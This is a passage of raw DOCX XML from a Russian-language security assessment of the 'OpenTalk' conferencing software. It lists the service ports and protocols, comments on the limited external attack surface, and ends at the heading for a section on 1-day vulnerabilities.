              <w:t>Обратный прокси-сервер, точка входа</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="0416F960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AED4C" w14:textId="202BE11A" w:rsidR="003F66DD" w:rsidRPr="00804C86" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>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F377" w14:textId="2E0B3AA6" w:rsidR="003F66DD" w:rsidRPr="004B22D3" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Глобальная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B520" w14:textId="2A0ED7BB" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F93F5C">
              <w:t>8090</w:t>
            </w:r>
            <w:r w:rsidRPr="00F93F5C">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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950B" w14:textId="065FFE50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HTTP (REST API)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8A95" w14:textId="2AB15AC8" w:rsidR="003F66DD" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>С</w:t>
            </w:r>
            <w:r w:rsidR="003F66DD" w:rsidRPr="00755A80">
              <w:t>ontroller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49D3" w14:textId="4CD73B44" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Серверная часть ПО</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="4064AA83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CBE9" w14:textId="4E676AC0" w:rsidR="003F66DD" w:rsidRPr="00804C86" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>3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190C" w14:textId="6DA94267" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Глобальная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1441" w14:textId="6571CA3D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8080/TCP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ECCF3" w14:textId="3C072BF4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HTTP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94765" w14:textId="3CB7889A" w:rsidR="003F66DD" w:rsidRPr="00F93F5C" w:rsidRDefault="00763E44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W</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003F66DD" w:rsidRPr="00F93F5C">
              <w:t>eb-frontend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49B40" w14:textId="0C119D08" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Внешний интерфейс ПО</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="751268A8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00CE" w14:textId="2F9DD51A" w:rsidR="003F66DD" w:rsidRPr="002D3CBF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9DDA" w14:textId="3DDBCDE8" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Глобальная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C84D2" w14:textId="4817DF25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8087/TCP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30D9" w14:textId="3115E720" w:rsidR="003F66DD" w:rsidRPr="00755A80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HTTP/OIDC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ED664" w14:textId="3CE0CCDC" w:rsidR="003F66DD" w:rsidRPr="00755A80" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:t xml:space="preserve"> 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80D6" w14:textId="182D7B23" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Аутентификация пользователя</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="2428E689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E9D8" w14:textId="550511AC" w:rsidR="003F66DD" w:rsidRPr="002D3CBF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E434" w14:textId="3E706152" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Глобальная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657A" w14:textId="373A8263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7880/TCP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B0D8" w14:textId="4F1BBA63" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00755A80">
              <w:t>HTTP/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00755A80">
              <w:t>WebSocket</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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18CC" w14:textId="0CF9E0D9" w:rsidR="003F66DD" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>LiveKit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2B23" w14:textId="775B4BD7" w:rsidR="003F66DD" w:rsidRPr="005C6D8E" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004B22D3">
              <w:t xml:space="preserve">Сигнальный канал </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="004B22D3">
              <w:t>WebRTC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="0EEFFE9D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A154D" w14:textId="3E83DB69" w:rsidR="003F66DD" w:rsidRPr="002D3CBF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F18E" w14:textId="60BEF274" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Глобальная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2B279" w14:textId="6BEECB26" w:rsidR="003F66DD" w:rsidRPr="00F93F5C" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>7881/TCP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964A" w14:textId="5D50D6DF" w:rsidR="003F66DD" w:rsidRPr="00F93F5C" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F93F5C">
              <w:t>WebRTC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/TCP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34F8D" w14:textId="7E3B3FC7" w:rsidR="003F66DD" w:rsidRPr="00F93F5C" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>LiveKit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B6AE" w14:textId="75E5F524" w:rsidR="003F66DD" w:rsidRPr="003329EF" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="003329EF">
              <w:t>Аудио/видео</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> передача (если нет доступа к </w:t>
            </w:r>
            <w:r w:rsidR="00763E44">
              <w:t>UDP</w:t>
            </w:r>
            <w:r w:rsidRPr="003329EF">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="165FF73D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798DD" w14:textId="63852282" w:rsidR="003F66DD" w:rsidRPr="002D3CBF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293B" w14:textId="17D8397A" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя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9932" w14:textId="30BD2FAC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20000-39000/UDP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E80F" w14:textId="11615A0B" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F93F5C">
              <w:t>WebRTC</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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5992" w14:textId="2F68E051" w:rsidR="003F66DD" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>LiveKit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12DF" w14:textId="26EEA133" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="003329EF">
              <w:t>Аудио/видео</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> передача</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="51B65F1C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BEF4" w14:textId="0B70A617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7B1F" w14:textId="5D21AB2D" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя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41E11" w14:textId="63BEF671" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>5432</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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48CB" w14:textId="29A748D7" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00400152">
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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6CAF" w14:textId="330796B2" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>P</w:t>
            </w:r>
            <w:r w:rsidR="003F66DD" w:rsidRPr="00400152">
              <w:t>ostgres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66B8" w14:textId="611EB185" w:rsidR="003F66DD" w:rsidRPr="003329EF" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003329EF">
              <w:t xml:space="preserve">БД </w:t>
            </w:r>
            <w:r>
              <w:t>С</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>ontroller</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="3CFDF7C6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AF9D" w14:textId="7BA06524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E0795" w14:textId="6FB0BD7A" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя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5A809" w14:textId="44779204" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>5433</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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30FF" w14:textId="3E4C9EBD" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00400152">
              <w:t>PostgreSQL</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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644E" w14:textId="405C3B64" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="00763E44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P</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003F66DD" w:rsidRPr="00400152">
              <w:t>ostgres-kc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CA9F" w14:textId="7589E7CE" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="003329EF">
              <w:t xml:space="preserve">БД </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00763E44">
              <w:t>Keycloak</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="001F04CB">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="35770DC9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1C81" w14:textId="0355ADB2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3ACA" w14:textId="6A61F33E" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя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80B29" w14:textId="4883E6FB" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>5672</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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EB14" w14:textId="51FAF5C7" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>AMQP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7272C" w14:textId="4AF6CF26" w:rsidR="003F66DD" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Rabbit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692B6" w14:textId="6E18D798" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="004B22D3">
              <w:t>Обмен сообщениями между</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> контейнерами</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="11AB1656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401B6" w14:textId="4375820D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6954" w14:textId="4ABD9087" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя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F768F" w14:textId="538A7DDA" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>15672</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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42AE3" w14:textId="133F258A" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>HTTP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FF43" w14:textId="35BDAA80" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Rabbit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7B0B" w14:textId="7D80C571" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="004B22D3">
              <w:t>Web-интерфейс</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="0191953A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9F66" w14:textId="57A2F882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FFC27" w14:textId="655E604F" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя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90D75" w14:textId="30C19927" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>15692</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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F834" w14:textId="1C8FA2D9" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>HTTP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AD4B" w14:textId="45D1F7D8" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Rabbit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7FE40" w14:textId="70AD3767" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>Метрики</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="16E7DAB0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F7198" w14:textId="6EC5E550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lastRenderedPageBreak/>
              <w:t>13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59A34" w14:textId="70A1ABA9" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя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8964" w14:textId="6D9F1835" w:rsidR="003F66DD" w:rsidRPr="003329EF" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003329EF">
              <w:t>25672</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>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ACA1" w14:textId="7F8AA356" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:t>-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542A" w14:textId="51C94FD1" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Rabbit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812A" w14:textId="7081ADBB" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="004B22D3">
              <w:t>Служебный порт</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003F66DD" w14:paraId="493CF6CB" w14:textId="77777777" w:rsidTr="001B7E9E">
        <w:trPr>
          <w:cantSplit/>
          <w:trHeight w:val="488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FA6A0" w14:textId="1647A298" w:rsidR="003F66DD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1441" w14:textId="054360FE" w:rsidR="003F66DD" w:rsidRPr="004B22D3" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>Внутренняя сеть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CA12" w14:textId="1B48B2D8" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00400152">
              <w:t>9000</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>/TCP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DE0D1" w14:textId="7B12B8E0" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HTTP(S3)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8852" w14:textId="67BFC0D0" w:rsidR="003F66DD" w:rsidRPr="00400152" w:rsidRDefault="00763E44" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>M</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="003F66DD" w:rsidRPr="003329EF">
              <w:t>inio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75D3" w14:textId="37E0521F" w:rsidR="003F66DD" w:rsidRDefault="003F66DD" w:rsidP="00C27C90">
            <w:pPr>
              <w:pStyle w:val="1120"/>
            </w:pPr>
            <w:r w:rsidRPr="003329EF">
              <w:t>Объектное хранилище</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="14"/>
    </w:tbl>
    <w:p w14:paraId="709C6143" w14:textId="3FC9C9FB" w:rsidR="00F0240D" w:rsidRDefault="00F0240D" w:rsidP="00F0240D">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20E91C1B" w14:textId="5537A268" w:rsidR="003F66DD" w:rsidRPr="00E9121A" w:rsidRDefault="003F66DD" w:rsidP="003F66DD">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">На основе </w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:instrText xml:space="preserve"> REF _Ref234282626 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t>таблицы 2.1</w:t>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="00D80616">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">можно сделать вывод, что ПО </w:t>
      </w:r>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t>«</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00763E44" w:rsidRPr="00763E44">
        <w:t xml:space="preserve">» </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">построена на базовой </w:t>
      </w:r>
      <w:r w:rsidRPr="003F66DD">
        <w:t>микросервисной архитектур</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">е </w:t>
      </w:r>
      <w:r w:rsidR="00EF198B">
        <w:t xml:space="preserve">и </w:t>
      </w:r>
      <w:r w:rsidR="00EF198B" w:rsidRPr="003F66DD">
        <w:t>комбинации</w:t>
      </w:r>
      <w:r w:rsidRPr="003F66DD">
        <w:t xml:space="preserve"> протоколов</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003F66DD">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:snapToGrid/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="ru-RU" w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003F66DD">
        <w:t xml:space="preserve">Большинство внутренних портов доступны исключительно </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">во внутренней </w:t>
      </w:r>
      <w:r w:rsidRPr="003F66DD">
        <w:t>сети, что существенно ограничивает поверхность атаки при внешнем сканировании</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10715681" w14:textId="77777777" w:rsidR="009E5D16" w:rsidRDefault="009E5D16" w:rsidP="00F0240D">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74FD1992" w14:textId="77777777" w:rsidR="009E5D16" w:rsidRDefault="009E5D16" w:rsidP="00F0240D">
      <w:pPr>
        <w:pStyle w:val="114"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C961BD" w14:textId="7EF6A38C" w:rsidR="00355459" w:rsidRDefault="000F1C53" w:rsidP="00355459">
      <w:pPr>
        <w:pStyle w:val="120"/>
      </w:pPr>
      <w:r>
        <w:t>Анализ 1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>day</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB7761">
        <w:t>в ПО</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321CEA45" w14:textId="0A05349C" w:rsidR="00E9121A" w:rsidRDefault="003A6063" w:rsidP="00E9121A">
      <w:pPr>
        <w:pStyle w:val="130"/>
      </w:pPr>
      <w:r>
        <w:t>Уязвимости 1-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>day</w:t>
      </w:r>
      <w:r w:rsidRPr="003A6063">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>в ПО «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F72134">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>OpenTalk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
